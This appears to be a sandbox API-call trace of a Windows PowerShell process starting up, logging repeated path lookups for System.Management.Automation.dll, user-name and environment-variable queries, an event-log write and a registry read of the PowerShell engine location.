	[0222.270] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.270] SetErrorMode (uMode=0x1) returned 0x1
	[0222.270] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x25d190 | out: lpFileInformation=0x25d190*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.270] SetErrorMode (uMode=0x1) returned 0x1
	[0228.183] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0228.183] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d4f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d4f8) returned 0x1
	[0228.184] CoTaskMemFree (pv=0x1b980ae0) 
	[0228.184] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0228.184] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d538 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d538) returned 1
	[0228.184] CoTaskMemFree (pv=0x4331c0) 
	[0228.186] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd50f0*="Available", lpRawData=0x2fd4e80) returned 1
	[0228.371] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0228.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.371] CoTaskMemFree (pv=0x3f5ba0) 
	[0228.372] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0228.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.372] CoTaskMemFree (pv=0x3f5ba0) 
	[0228.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.378] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0228.378] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0228.379] CoTaskMemFree (pv=0x3f5ba0) 
	[0228.379] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0228.379] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0228.379] CoTaskMemFree (pv=0x3f5ba0) 
	[0228.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.381] GetCurrentProcessId () returned 0xc5c
	[0228.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.400] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25d518 | out: phkResult=0x25d518*=0x330) returned 0x0
	[0228.400] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d49c, lpData=0x0, lpcbData=0x25d498*=0x0 | out: lpType=0x25d49c*=0x1, lpData=0x0, lpcbData=0x25d498*=0x56) returned 0x0
	[0228.400] CoTaskMemAlloc (cb=0x5a) returned 0x1b95d410
	[0228.400] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d46c, lpData=0x1b95d410, lpcbData=0x25d468*=0x56 | out: lpType=0x25d46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25d468*=0x56) returned 0x0
	[0228.401] RegCloseKey (hKey=0x330) returned 0x0
	[0228.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.962] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0228.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
